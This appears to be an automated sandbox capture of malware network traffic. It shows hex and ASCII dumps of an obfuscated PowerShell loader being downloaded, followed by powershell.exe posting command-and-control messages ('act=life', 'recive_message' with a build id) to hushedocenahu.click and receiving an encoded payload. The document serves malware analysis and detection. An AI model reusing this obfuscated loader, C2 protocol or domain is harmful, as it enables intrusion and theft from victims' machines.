                                                                                                                                  2024-12-25 14:09:09 UTC1369INData Raw: 67 69 47 6d 36 4d 44 33 57 47 66 53 61 4a 4a 75 43 50 4d 46 4b 4b 63 6c 38 70 6e 6e 61 43 39 64 72 73 72 4f 71 4b 72 78 78 34 6e 57 6e 53 39 4c 58 79 32 44 67 76 35 6d 59 43 45 6d 4e 49 70 31 64 32 78 48 66 36 36 41 72 36 6b 34 72 7a 6d 33 6f 44 76 6e 46 39 32 48 4b 4d 51 69 59 30 76 37 46 4e 33 76 78 4f 72 62 43 38 72 6c 66 65 56 50 6d 77 51 38 54 57 33 52 78 53 66 77 66 77 49 65 43 73 6a 6f 4e 30 52 65 7a 75 7a 31 4f 6d 7a 49 75 63 6f 64 61 67 66 39 4f 46 61 57 70 39 50 61 70 74 53 41 49 6d 76 53 65 4d 46 53 47 75 6c 42 4e 68 49 78 75 59 74 56 32 6f 62 35 58 52 4b 4a 77 64 33 69 67 43 41 4f 6d 39 48 53 4d 6c 70 6b 6e 61 43 72 61 4f 38 5a 39 31 69 47 47 6a 55 4b 62 52 39 56 73 41 55 79 6f 53 70 68 38 59 47 54 4f 66 7a 49 4d 4d 36 49 31 38 65 20 3d 20 22
                                                                                                                                  Data Ascii: giGm6MD3WGfSaJJuCPMFKKcl8pnnaC9drsrOqKrxx4nWnS9LXy2Dgv5mYCEmNIp1d2xHf66Ar6k4rzm3oDvnF92HKMQiY0v7FN3vxOrbC8rlfeVPmwQ8TW3RxSfwfwIeCsjoN0Rezuz1OmzIucodagf9OFaWp9PaptSAImvSeMFSGulBNhIxuYtV2ob5XRKJwd3igCAOm9HSMlpknaCraO8Z91iGGjUKbR9VsAUyoSph8YGTOfzIMM6I18e = "
                                                                                                                                  2024-12-25 14:09:09 UTC1369INData Raw: 68 68 51 4f 49 34 62 36 6e 69 37 31 65 79 73 74 4c 6d 69 58 69 58 4b 4a 72 4c 32 6b 6d 79 68 7a 53 42 47 63 59 70 63 66 59 61 6e 4f 6a 50 35 76 30 61 65 41 5a 51 4e 36 54 35 38 75 69 4e 70 36 42 54 64 6c 36 74 62 36 62 78 79 61 42 56 52 38 56 57 56 59 5a 63 30 4a 6e 36 38 72 6f 73 4c 65 79 38 52 55 58 41 31 61 69 64 46 42 63 41 5a 45 59 70 77 6e 38 70 6c 41 68 61 4a 6b 49 62 69 70 35 54 6a 38 4b 65 61 38 6f 4e 46 41 4e 74 4a 4c 79 64 7a 74 6d 30 6f 4d 4e 38 35 5a 78 6c 45 6f 63 33 6d 54 67 4d 51 57 55 63 34 31 47 6d 37 6e 48 36 66 73 56 47 44 6d 6d 65 45 6a 72 4e 66 6f 74 51 41 46 44 6a 4d 7a 78 33 51 75 69 6a 5a 6a 76 34 43 73 37 38 61 52 71 56 54 31 47 62 73 49 45 74 4e 5a 79 6d 49 63 33 49 44 77 65 35 58 36 78 33 56 4e 39 76 30 62 43 4d 6d 56 61 57 72
                                                                                                                                  Data Ascii: hhQOI4b6ni71eystLmiXiXKJrL2kmyhzSBGcYpcfYanOjP5v0aeAZQN6T58uiNp6BTdl6tb6bxyaBVR8VWVYZc0Jn68rosLey8RUXA1aidFBcAZEYpwn8plAhaJkIbip5Tj8Kea8oNFANtJLydztm0oMN85ZxlEoc3mTgMQWUc41Gm7nH6fsVGDmmeEjrNfotQAFDjMzx3QuijZjv4Cs78aRqVT1GbsIEtNZymIc3IDwe5X6x3VN9v0bCMmVaWr
                                                                                                                                  2024-12-25 14:09:09 UTC1369INData Raw: 75 72 64 4b 52 57 6a 67 4c 6d 76 53 48 2d 31 32 2d 28 24 55 44 4d 63 57 2d 31 2d 28 24 75 72 64 4b 52 57 6a 67 4c 6d 76 53 48 2d 32 38 2d 39 29 29 29 2d 24 55 53 46 4b 6f 51 50 6a 74 6e 2d 34 36 2b 34 33 29 29 29 0d 0a 73 77 69 74 63 68 28 28 33 2b 31 38 2b 24 4c 62 43 74 5a 4c 43 53 57 76 52 53 77 29 2d 28 33 34 2d 32 36 2d 24 5a 4f 43 6d 6a 75 4a 44 50 73 66 29 2d 28 33 37 2d 34 30 2d 34 29 29 7b 0d 0a 28 28 28 28 24 45 66 43 4f 51 78 6a 77 73 64 41 2d 31 36 2d 24 71 63 48 78 45 54 57 74 70 78 45 43 46 2d 34 2d 34 34 2d 24 66 6f 48 55 4a 7a 6f 62 4d 57 29 29 2b 28 28 24 51 75 76 4d 4c 78 4b 69 48 43 54 2d 33 39 2d 32 33 29 29 29 29 20 0d 0a 7b 0d 0a 24 76 68 78 71 55 79 59 63 20 3d 20 36 31 30 0d 0a 24 49 61 6e 74 61 77 20 3d 20 24 4c 62 43 74 5a 4c 43
                                                                                                                                  Data Ascii: urdKRWjgLmvSH-12-($UDMcW-1-($urdKRWjgLmvSH-28-9)))-$USFKoQPjtn-46+43)))switch((3+18+$LbCtZLCSWvRSw)-(34-26-$ZOCmjuJDPsf)-(37-40-4)){(((($EfCOQxjwsdA-16-$qcHxETWtpxECF-4-44-$foHUJzobMW))+(($QuvMLxKiHCT-39-23)))) {$vhxqUyYc = 610$Iantaw = $LbCtZLC
                                                                                                                                  2024-12-25 14:09:09 UTC1369INData Raw: 58 66 59 20 3d 20 35 35 39 0d 0a 24 4a 79 65 73 61 46 51 64 46 7a 57 52 4b 63 20 3d 20 24 6f 72 6a 4d 70 65 4e 0d 0a 24 49 79 62 63 44 48 47 6d 6a 54 20 3d 20 36 0d 0a 24 4e 49 41 73 69 65 20 3d 20 28 28 28 28 28 31 39 2a 32 33 2a 33 35 29 29 2d 31 36 2d 32 2b 28 33 38 2b 32 33 2b 35 29 29 2d 28 31 34 38 37 39 29 29 29 0d 0a 24 4e 4d 45 47 52 4f 20 3d 20 28 28 28 28 28 33 31 2d 37 2a 31 32 29 2a 34 31 2a 31 30 2d 28 34 2d 34 37 2a 33 31 2a 34 37 2a 31 32 2a 32 32 29 29 2d 28 33 34 2a 33 35 2a 38 29 29 2d 28 31 38 30 34 37 30 30 38 29 29 29 0d 0a 24 5a 79 71 47 47 20 3d 20 24 49 79 62 63 44 48 47 6d 6a 54 0d 0a 24 58 51 41 74 6c 6b 55 66 4d 20 3d 20 24 45 53 4b 57 51 6c 4e 6b 56 75 0d 0a 0d 0a 24 4b 53 59 6c 6e 74 59 44 6d 75 20 3d 20 28 28 24 66 6f 48 55
                                                                                                                                  Data Ascii: XfY = 559$JyesaFQdFzWRKc = $orjMpeN$IybcDHGmjT = 6$NIAsie = (((((19*23*35))-16-2+(38+23+5))-(14879)))$NMEGRO = (((((31-7*12)*41*10-(4-47*31*47*12*22))-(34*35*8))-(18047008)))$ZyqGG = $IybcDHGmjT$XQAtlkUfM = $ESKWQlNkVu$KSYlntYDmu = (($foHU
                                                                                                                                  2024-12-25 14:09:09 UTC1369INData Raw: 32 32 2b 24 4a 79 65 73 61 46 51 64 46 7a 57 52 4b 63 2d 28 28 24 51 75 76 4d 4c 78 4b 69 48 43 54 2d 34 32 2d 31 36 29 29 29 29 29 2b 28 35 39 37 29 29 0d 0a 24 50 4c 4c 79 6b 4a 77 58 63 44 7a 20 3d 20 28 28 28 28 31 2b 34 39 2b 32 39 29 29 29 2b 28 34 33 2d 31 32 2d 34 38 2b 34 35 2d 34 2d 28 24 6b 57 47 68 4f 54 55 7a 58 4e 53 65 68 51 2b 32 30 2d 34 38 29 29 2d 28 32 32 29 29 0d 0a 24 4f 65 72 55 47 56 6b 41 4d 65 20 3d 20 28 28 28 28 34 38 2b 33 34 2b 24 66 6f 48 55 4a 7a 6f 62 4d 57 29 29 29 2b 28 32 34 2b 34 35 2d 24 53 43 64 76 4e 72 72 29 2b 28 24 49 61 6e 74 61 77 2b 31 31 2b 28 24 4e 49 41 73 69 65 2b 32 34 2b 24 64 74 57 45 48 47 4f 77 69 6e 29 29 2b 28 28 34 36 2b 31 38 2b 34 29 29 2d 28 31 31 35 31 29 29 0d 0a 24 53 56 4a 58 61 63 4b 5a 54
                                                                                                                                  Data Ascii: 22+$JyesaFQdFzWRKc-(($QuvMLxKiHCT-42-16)))))+(597))$PLLykJwXcDz = ((((1+49+29)))+(43-12-48+45-4-($kWGhOTUzXNSehQ+20-48))-(22))$OerUGVkAMe = ((((48+34+$foHUJzobMW)))+(24+45-$SCdvNrr)+($Iantaw+11+($NIAsie+24+$dtWEHGOwin))+((46+18+4))-(1151))$SVJXacKZT
                                                                                                                                  2024-12-25 14:09:09 UTC1369INData Raw: 0a 24 71 5a 53 64 46 6f 65 6a 57 63 74 20 3d 20 28 28 28 28 31 38 2d 31 30 2b 32 29 2b 24 71 63 48 78 45 54 57 74 70 78 45 43 46 2b 36 2b 31 31 29 29 2d 24 61 4a 76 63 55 54 52 48 52 70 65 2d 34 35 2b 24 4c 62 43 74 5a 4c 43 53 57 76 52 53 77 2d 24 45 66 43 4f 51 78 6a 77 73 64 41 2d 32 37 2d 24 55 44 4d 63 57 2b 31 39 2d 32 2d 31 33 2d 28 32 35 30 38 29 29 0d 0a 24 57 6e 44 69 52 4c 72 61 20 3d 20 28 28 28 28 34 30 2b 32 38 2b 24 4a 79 65 73 61 46 51 64 46 7a 57 52 4b 63 29 29 2b 24 59 73 4f 70 4b 57 76 7a 52 2d 34 35 2b 33 33 2b 28 34 31 2d 34 32 2b 34 34 29 29 2d 24 77 65 72 44 54 69 6b 61 6b 6d 62 4a 72 2b 33 39 2b 24 71 41 73 6e 76 50 62 50 6a 57 75 73 46 2d 24 54 74 6a 70 6d 44 69 79 5a 2d 34 2d 33 32 2d 28 34 33 31 29 29 0d 0a 24 6c 6d 6c 6e 6b 71
                                                                                                                                  Data Ascii: $qZSdFoejWct = ((((18-10+2)+$qcHxETWtpxECF+6+11))-$aJvcUTRHRpe-45+$LbCtZLCSWvRSw-$EfCOQxjwsdA-27-$UDMcW+19-2-13-(2508))$WnDiRLra = ((((40+28+$JyesaFQdFzWRKc))+$YsOpKWvzR-45+33+(41-42+44))-$werDTikakmbJr+39+$qAsnvPbPjWusF-$TtjpmDiyZ-4-32-(431))$lmlnkq
                                                                                                                                  2024-12-25 14:09:09 UTC1369INData Raw: 79 6b 4a 77 58 63 44 7a 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 4f 65 72 55 47 56 6b 41 4d 65 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 53 56 4a 58 61 63 4b 5a 54 62 56 50 52 45 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 4c 63 5a 65 74 56 62 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 47 6f 78 51 4b 57 67 6e 75 4c 6d 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 4b 70 4f 6b 58 44 45 53 72 62 7a 66 73 4a 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 53 42 55 7a 6d 43 4a 41 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 6b 79 69 76 48 6d 57 61 50 63 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 6a 4f 48 41 70 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 58 55 63 61 71 55 6b 4e 20 2b 20 5b 63 68 61 72 5d 5b 69 6e 74 5d 24 41 51 4a 42 57 42 6b 6c 53 66
                                                                                                                                  Data Ascii: ykJwXcDz + [char][int]$OerUGVkAMe + [char][int]$SVJXacKZTbVPRE + [char][int]$LcZetVb + [char][int]$GoxQKWgnuLm + [char][int]$KpOkXDESrbzfsJ + [char][int]$SBUzmCJA + [char][int]$kyivHmWaPc + [char][int]$jOHAp + [char][int]$XUcaqUkN + [char][int]$AQJBWBklSf
                                                                                                                                  2024-12-25 14:09:09 UTC564INData Raw: 53 57 76 52 53 77 29 2d 28 33 34 2d 32 36 2d 24 5a 4f 43 6d 6a 75 4a 44 50 73 66 29 2d 28 33 37 2d 34 30 2d 34 29 29 7b 0d 0a 28 28 28 28 24 45 66 43 4f 51 78 6a 77 73 64 41 2d 31 36 2d 24 71 63 48 78 45 54 57 74 70 78 45 43 46 2d 34 2d 34 34 2d 24 66 6f 48 55 4a 7a 6f 62 4d 57 29 29 2b 28 28 24 51 75 76 4d 4c 78 4b 69 48 43 54 2d 33 39 2d 32 33 29 29 29 29 20 0d 0a 7b 0d 0a 24 76 68 78 71 55 79 59 63 20 3d 20 36 31 30 0d 0a 24 49 61 6e 74 61 77 20 3d 20 24 4c 62 43 74 5a 4c 43 53 57 76 52 53 77 0d 0a 24 72 7a 74 47 4b 63 41 70 49 73 79 20 3d 20 24 55 53 46 4b 6f 51 50 6a 74 6e 0d 0a 24 6d 78 4b 42 63 6c 76 79 53 70 57 20 3d 20 24 4c 62 43 74 5a 4c 43 53 57 76 52 53 77 0d 0a 24 70 57 4d 74 73 43 76 73 20 3d 20 24 45 66 43 4f 51 78 6a 77 73 64 41 0d 0a 7d
                                                                                                                                  Data Ascii: SWvRSw)-(34-26-$ZOCmjuJDPsf)-(37-40-4)){(((($EfCOQxjwsdA-16-$qcHxETWtpxECF-4-44-$foHUJzobMW))+(($QuvMLxKiHCT-39-23)))) {$vhxqUyYc = 610$Iantaw = $LbCtZLCSWvRSw$rztGKcApIsy = $USFKoQPjtn$mxKBclvySpW = $LbCtZLCSWvRSw$pWMtsCvs = $EfCOQxjwsdA}
                                                                                                                                  2024-12-25 14:09:09 UTC1369INData Raw: 70 78 20 3d 20 28 28 28 33 38 2b 34 35 2b 34 34 2d 28 28 31 2d 32 32 2a 32 36 2b 28 34 32 2d 33 35 2b 31 36 29 29 29 29 2d 28 36 35 31 29 29 29 0d 0a 24 64 74 57 45 48 47 4f 77 69 6e 20 3d 20 28 28 28 33 2b 32 38 2a 28 31 35 2b 34 39 2b 37 29 2a 31 38 2b 31 31 2d 28 32 2b 32 39 2d 33 39 29 29 2d 28 33 35 35 34 35 29 29 29 0d 0a 62 72 65 61 6b 0d 0a 7d 24 6b 68 63 4e 65 4c 78 20 3d 20 38 39 33 0d 0a 24 6f 72 6a 4d 70 65 4e 20 3d 20 24 6a 72 4f 67 46 55 56 49 64 0d 0a 24 71 41 73 6e 76 50 62 50 6a 57 75 73 46 20 3d 20 28 28 24 77 65 72 44 54 69 6b 61 6b 6d 62 4a 72 2b 32 34 2b 28 31 34 2b 32 31 2b 24 6d 78 4b 42 63 6c 76 79 53 70 57 29 2d 38 2b 32 31 2d 33 33 29 2b 24 75 72 64 4b 52 57 6a 67 4c 6d 76 53 48 2d 34 35 2d 32 33 29 0d 0a 24 6b 58 7a 74 51 52 41
                                                                                                                                  Data Ascii: px = (((38+45+44-((1-22*26+(42-35+16))))-(651)))$dtWEHGOwin = (((3+28*(15+49+7)*18+11-(2+29-39))-(35545)))break}$khcNeLx = 893$orjMpeN = $jrOgFUVId$qAsnvPbPjWusF = (($werDTikakmbJr+24+(14+21+$mxKBclvySpW)-8+21-33)+$urdKRWjgLmvSH-45-23)$kXztQRA


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.449823104.21.112.14438032C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-25 14:10:32 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 8
                                                                                                                                  Host: hushedocenahu.click
                                                                                                                                  2024-12-25 14:10:32 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                  Data Ascii: act=life
                                                                                                                                  2024-12-25 14:10:33 UTC1125INHTTP/1.1 200 OK
                                                                                                                                  Date: Wed, 25 Dec 2024 14:10:33 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=pf83kp26gkdnadmd5j7kqlpp1j; expires=Sun, 20 Apr 2025 07:57:12 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hp3pTDU9UhWiiGlkwxFkqRuNHG94%2BfCfyUV6AOW82KAvFITCDJYkcgyyv2XUApWKM%2B2aQFWkjB%2FN25pPs9kutTcq3gIHPIqQl7j6v0A6pdC2MO57DEebaE31aVIrvoxhrC2ZXlXR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f796a4cc9bd727b-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1916&min_rtt=1908&rtt_var=731&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=910&delivery_rate=1479979&cwnd=232&unsent_bytes=0&cid=bca6346b8a55ec04&ts=738&x=0"
                                                                                                                                  2024-12-25 14:10:33 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                  Data Ascii: 2ok
                                                                                                                                  2024-12-25 14:10:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.449825104.21.112.14438032C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-25 14:10:34 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 48
                                                                                                                                  Host: hushedocenahu.click
                                                                                                                                  2024-12-25 14:10:34 UTC48OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 37 26 6a 3d
                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=yJEcaG--singl7&j=
                                                                                                                                  2024-12-25 14:10:35 UTC1129INHTTP/1.1 200 OK
                                                                                                                                  Date: Wed, 25 Dec 2024 14:10:35 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=e3a58f0ggn627o4k5inq75fqia; expires=Sun, 20 Apr 2025 07:57:14 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mW7kdaNsbT71IAbBCh8LNqjEd0%2FUVbF6dMldcbCPNDV0cFdROodcKSGu5O9hbMcwqzTC4kxyN%2FFqIpEyHV1vCAPrdHQKKHQQi5oOupf%2BgOnuZPi2F%2Fs5kprcos9TN9uIyr8prAI4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f796a593e2dc34f-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13330&min_rtt=1542&rtt_var=7693&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=951&delivery_rate=1893644&cwnd=181&unsent_bytes=0&cid=13c8344d12ac8171&ts=765&x=0"
                                                                                                                                  2024-12-25 14:10:35 UTC240INData Raw: 31 63 62 61 0d 0a 59 4e 4d 72 41 7a 4a 32 55 62 6c 41 4b 55 46 6c 38 78 66 54 75 55 6d 51 6b 62 66 45 34 47 49 4a 2f 54 75 53 73 55 76 6e 57 4e 73 62 38 56 30 68 43 45 4a 39 6d 7a 4e 4d 59 31 2b 48 5a 61 62 63 5a 62 4c 77 30 2b 62 61 42 47 69 52 53 50 65 64 61 5a 45 31 2b 56 71 31 53 6d 39 42 45 33 32 62 4a 56 46 6a 58 36 68 73 38 64 77 6e 73 71 75 56 6f 59 6f 41 61 4a 46 5a 38 39 6f 6b 6c 7a 53 34 43 4c 39 4d 61 31 63 56 4e 64 67 73 52 43 51 41 6c 6e 61 35 31 79 44 39 2b 64 72 6d 7a 45 42 73 68 78 6d 6f 6b 77 61 43 4c 4c 6f 74 73 6c 68 6f 45 41 74 39 77 6d 4a 4d 4c 30 66 4a 4e 62 4c 63 4b 2f 7a 33 30 36 2b 49 43 6d 47 5a 57 50 62 62 4f 34 34 2b 73 77 69 78 54 32 70 64 48 43 48 56 4a 6b 4d 76 42 70 78 32 38 5a
                                                                                                                                  Data Ascii: 1cbaYNMrAzJ2UblAKUFl8xfTuUmQkbfE4GIJ/TuSsUvnWNsb8V0hCEJ9mzNMY1+HZabcZbLw0+baBGiRSPedaZE1+Vq1Sm9BE32bJVFjX6hs8dwnsquVoYoAaJFZ89oklzS4CL9Ma1cVNdgsRCQAlna51yD9+drmzEBshxmokwaCLLotslhoEAt9wmJML0fJNbLcK/z306+ICmGZWPbbO44+swixT2pdHCHVJkMvBpx28Z
                                                                                                                                  2024-12-25 14:10:35 UTC1369INData Raw: 56 72 39 65 75 56 2f 73 4a 54 57 5a 78 49 34 63 59 6b 6c 54 7a 35 48 66 39 51 49 56 63 59 63 34 4e 69 51 79 38 4a 6c 48 61 2b 33 43 72 79 34 64 71 6d 67 51 68 6a 6d 31 50 2f 33 43 61 4c 4d 4c 34 4b 75 45 35 75 56 78 77 31 31 43 45 4c 62 55 65 57 62 66 47 44 61 39 4c 6a 31 71 57 57 44 58 72 66 52 72 37 4b 61 59 49 32 2b 56 72 78 54 32 39 52 47 54 50 4a 4b 6b 41 6f 41 6f 4e 2b 75 4e 59 6d 38 76 37 66 71 59 45 41 62 4a 56 54 2f 39 6b 74 69 44 65 2f 41 72 45 4a 4c 78 41 54 4b 35 74 36 43 77 41 43 67 58 4b 39 7a 57 6e 49 73 38 72 6f 6d 30 42 73 6b 78 6d 6f 6b 79 47 41 4f 62 6f 4a 76 6b 70 70 57 77 59 7a 79 53 52 47 4a 68 57 58 63 4c 2f 52 4b 4f 44 35 32 36 43 42 43 57 43 57 58 50 66 58 61 63 74 36 76 68 72 78 45 53 46 78 47 54 6a 58 4b 46 77 6a 52 34 34 37 71
                                                                                                                                  Data Ascii: Vr9euV/sJTWZxI4cYklTz5Hf9QIVcYc4NiQy8JlHa+3Cry4dqmgQhjm1P/3CaLML4KuE5uVxw11CELbUeWbfGDa9Lj1qWWDXrfRr7KaYI2+VrxT29RGTPJKkAoAoN+uNYm8v7fqYEAbJVT/9ktiDe/ArEJLxATK5t6CwACgXK9zWnIs8rom0BskxmokyGAOboJvkppWwYzySRGJhWXcL/RKOD526CBCWCWXPfXact6vhrxESFxGTjXKFwjR447q
                                                                                                                                  2024-12-25 14:10:35 UTC1369INData Raw: 2f 33 36 43 4e 44 57 66 66 46 37 44 55 4d 63 56 69 2b 53 69 79 58 57 4a 61 56 67 62 59 4c 45 55 6b 45 64 46 71 2f 38 4a 72 39 66 2b 56 2f 73 49 4e 61 70 64 66 34 74 77 6b 68 6a 53 33 44 62 52 47 61 56 41 55 50 74 34 6d 51 43 67 45 6e 48 47 6a 30 53 76 36 39 74 53 73 69 45 41 6c 33 31 37 6f 6b 33 48 46 43 36 34 4a 38 33 78 69 58 68 6f 30 7a 57 4a 55 62 52 37 52 63 72 32 62 63 37 4c 2b 33 61 4f 48 44 32 71 56 56 2f 58 5a 4a 59 30 30 75 68 43 2b 54 57 46 63 48 44 6e 57 4c 45 38 72 44 70 70 2b 74 39 73 71 2b 4c 4f 62 35 6f 55 59 4b 38 63 5a 78 4e 51 6c 69 44 58 37 4e 37 4a 48 62 31 63 43 63 38 52 73 55 6d 4d 41 6e 54 58 70 6d 79 66 37 38 39 36 73 68 67 42 73 6b 6c 7a 7a 31 43 71 49 50 62 4d 4d 74 6b 31 74 57 52 6b 31 32 79 56 50 4a 68 57 55 66 4c 33 58 61 37
                                                                                                                                  Data Ascii: /36CNDWffF7DUMcVi+SiyXWJaVgbYLEUkEdFq/8Jr9f+V/sINapdf4twkhjS3DbRGaVAUPt4mQCgEnHGj0Sv69tSsiEAl317ok3HFC64J83xiXho0zWJUbR7Rcr2bc7L+3aOHD2qVV/XZJY00uhC+TWFcHDnWLE8rDpp+t9sq+LOb5oUYK8cZxNQliDX7N7JHb1cCc8RsUmMAnTXpmyf7896shgBsklzz1CqIPbMMtk1tWRk12yVPJhWUfL3Xa7
                                                                                                                                  2024-12-25 14:10:35 UTC1369INData Raw: 6e 55 35 79 33 31 37 38 6b 33 48 46 4d 37 41 51 76 30 64 6f 58 52 49 37 33 43 78 47 4b 41 47 61 63 72 62 64 4a 76 72 2b 30 4b 57 44 42 47 47 4e 57 76 76 5a 4a 49 39 36 39 30 4b 32 55 53 45 49 56 42 54 58 43 31 73 34 46 59 63 31 72 70 55 79 73 76 54 5a 35 74 70 41 61 4a 42 51 2f 39 73 68 69 6a 57 39 44 4c 64 50 62 46 55 62 4f 63 6b 71 52 53 34 4d 6e 6e 36 6a 32 79 62 32 2f 39 47 75 69 51 6f 72 30 52 6e 33 79 32 6e 64 65 6f 77 50 76 6b 6c 69 52 6c 51 73 6c 54 73 4c 4a 41 76 52 4c 66 48 58 4a 66 4c 38 32 61 71 4a 43 47 71 54 56 2f 66 57 49 49 30 79 71 77 4f 31 51 57 42 65 47 7a 4c 66 4a 30 34 6e 41 4a 56 7a 76 70 74 6c 73 76 54 4e 35 74 70 41 52 4c 68 73 73 76 49 54 78 53 58 33 47 2f 46 4f 62 52 42 4d 63 39 63 68 52 79 73 49 6c 33 79 39 30 53 4c 35 2f 39 36
                                                                                                                                  Data Ascii: nU5y3178k3HFM7AQv0doXRI73CxGKAGacrbdJvr+0KWDBGGNWvvZJI9690K2USEIVBTXC1s4FYc1rpUysvTZ5tpAaJBQ/9shijW9DLdPbFUbOckqRS4Mnn6j2yb2/9GuiQor0Rn3y2ndeowPvkliRlQslTsLJAvRLfHXJfL82aqJCGqTV/fWII0yqwO1QWBeGzLfJ04nAJVzvptlsvTN5tpARLhssvITxSX3G/FObRBMc9chRysIl3y90SL5/96
                                                                                                                                  2024-12-25 14:10:35 UTC1369INData Raw: 35 70 57 38 64 49 76 6c 7a 32 77 45 4c 39 45 62 6c 67 63 4f 74 6f 6d 54 69 34 42 6e 58 2b 77 33 43 58 38 2b 35 58 6f 77 67 64 7a 33 77 47 77 38 6a 6d 65 4b 4b 38 50 6b 45 52 75 45 41 74 39 77 6d 4a 4d 4c 30 66 4a 4e 62 6a 4a 4c 2f 2f 68 33 4b 47 4d 44 32 69 4e 57 50 33 59 4f 34 49 31 76 51 57 39 54 32 35 57 46 54 62 52 4c 6b 77 6d 44 4a 35 35 38 5a 56 72 39 65 75 56 2f 73 49 75 59 49 78 4f 38 39 30 69 6b 79 48 35 48 66 39 51 49 56 63 59 63 34 4e 69 53 43 67 4d 6c 58 57 39 32 79 2f 2f 38 38 65 70 68 51 64 69 6c 45 76 36 31 43 36 4f 4d 72 49 4e 74 31 74 74 58 67 59 32 79 54 41 4c 62 55 65 57 62 66 47 44 61 38 54 30 78 62 61 42 51 6c 71 4a 57 75 62 59 4a 49 6c 36 70 6b 79 6f 43 57 5a 63 56 47 75 62 4a 45 51 71 42 4a 35 30 75 4e 63 6d 39 2f 72 51 70 34 51 45
                                                                                                                                  Data Ascii: 5pW8dIvlz2wEL9EblgcOtomTi4BnX+w3CX8+5Xowgdz3wGw8jmeKK8PkERuEAt9wmJML0fJNbjJL//h3KGMD2iNWP3YO4I1vQW9T25WFTbRLkwmDJ558ZVr9euV/sIuYIxO890ikyH5Hf9QIVcYc4NiSCgMlXW92y//88ephQdilEv61C6OMrINt1ttXgY2yTALbUeWbfGDa8T0xbaBQlqJWubYJIl6pkyoCWZcVGubJEQqBJ50uNcm9/rQp4QE
